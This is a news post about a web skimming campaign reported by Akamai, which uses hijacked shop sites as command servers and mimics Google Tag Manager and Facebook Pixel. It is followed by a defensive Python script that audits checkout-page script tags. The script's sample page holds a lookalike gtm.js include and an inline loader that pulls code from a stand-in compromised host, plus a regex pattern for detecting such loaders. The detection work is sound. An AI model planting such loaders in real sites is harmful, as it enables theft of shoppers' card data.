New Web Skimming Campaign Uses Infected Sites to Manage Attacks

Lord777

Hackers use companies' trust to steal their customers' data.

Information security specialists from Akamai discovered a new web skimming campaign that uses infected sites as command and control servers (C2 server) for attacks.

A web skimmer is malicious code embedded in payment pages to steal personal and credit card information from site customers. Since the code is executed on the client side, malicious behavior is not detected by firewalls and other server protection tools.

The detected campaign differs in that it relies on infected legitimate sites to make the traffic look authentic. Since sites usually operate as legitimate companies, they arouse less suspicion in the victim. Target sites run on the CMS systems Magento, WooCommerce, WordPress, and Shopify, but contain a number of vulnerabilities.

Some of the infected sites are visited by hundreds of thousands of visitors a month, who can potentially have their payment and personal data stolen, especially considering that the campaign went unnoticed for almost a month on many of the victim sites.

In the campaign, legitimate sites that are hijacked to host malicious code act as the attacker's C2 server. Also, instead of directly injecting code into the site's resources, attackers use small pieces of JavaScript code that download the full malicious code from another infected company site, which allows hackers to hide most of the malicious code.

The malicious code is designed to mimic popular services like Google Tag Manager or Facebook Pixel. This method is popular among web skimmers because it helps malicious code "blend in" with its surroundings, masking its true intentions.
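The post describes three things a defender can look for on a checkout page: external scripts served from a host that should not be there (a compromised third-party company site acting as the C2), scripts whose filename imitates Google Tag Manager or Facebook Pixel but come from a different host, and small inline loaders that build a script element pointing at another infected site. The following audit script is an added example, not code from the Akamai report or from this post; the allowlist, the hostnames and the sample checkout page are all constructed for the demonstration.

```python
"""
Added example: allowlist-based audit of the <script> tags on a checkout page.
Flags the three patterns described in the post:
  1. external scripts loaded from hosts outside the shop's allowlist,
  2. scripts named like Google Tag Manager / Facebook Pixel files but served
     from a host other than the real one (lookalike),
  3. inline "loader" snippets that create a <script> element whose src
     points at a host outside the allowlist.
All hostnames, paths and the sample page below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the shop owner expects on the checkout page (assumed allowlist).
ALLOWED_HOSTS = {
    "shop.example",               # first-party host (constructed)
    "www.googletagmanager.com",   # real Google Tag Manager host
    "connect.facebook.net",       # real Facebook Pixel host
}

# Filenames of popular tag services and the host that legitimately serves them.
MIMICRY_TARGETS = {
    "gtm.js": "www.googletagmanager.com",
    "fbevents.js": "connect.facebook.net",
}

# Inline loader: a script element is created and then given a remote src.
LOADER_RE = re.compile(
    r"""createElement\(\s*['"]script['"]\s*\).*?src\s*=\s*['"](https?://[^'"]+)['"]""",
    re.S,
)


class ScriptCollector(HTMLParser):
    """Collects external script URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute values
        self.inline = []     # inline script bodies
        self._buf = None     # body of the inline script currently open

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def audit_page(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of (severity, reason, url) findings for one page."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []

    for src in parser.external:
        url = urlparse(src)
        host = url.hostname or ""          # "" for relative (first-party) paths
        name = url.path.rsplit("/", 1)[-1]  # filename, query string excluded
        real_host = MIMICRY_TARGETS.get(name)
        if real_host and host != real_host:
            findings.append(("high", "tag-service lookalike", src))
        elif host and host not in allowed_hosts:
            findings.append(("medium", "script host not on allowlist", src))

    for body in parser.inline:
        for match in LOADER_RE.finditer(body):
            loader_src = match.group(1)
            if (urlparse(loader_src).hostname or "") not in allowed_hosts:
                findings.append(("high", "inline loader fetches unlisted host", loader_src))
    return findings


# Constructed checkout page: one real GTM include, one lookalike served from a
# (constructed) compromised company site, and one inline loader.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script src="https://cdn.victim-company.example/assets/gtm.js"></script>
<script>
  (function(){var s=document.createElement('script');
  s.src='https://shop.other-victim.example/js/analytics.js';
  document.head.appendChild(s);})();
</script>
<script src="https://connect.facebook.net/en_US/fbevents.js"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for severity, reason, url in audit_page(SAMPLE_CHECKOUT_HTML):
        print(f"[{severity}] {reason}: {url}")
```

The allowlist is the same thing a Content Security Policy `script-src` directive expresses in the browser, and the audit is only as good as that list: a loader that fetches from a host you have allowed, or a skimmer injected directly into a first-party file, is not caught by it, so the check is a complement to integrity monitoring of the site's own JavaScript, not a replacement.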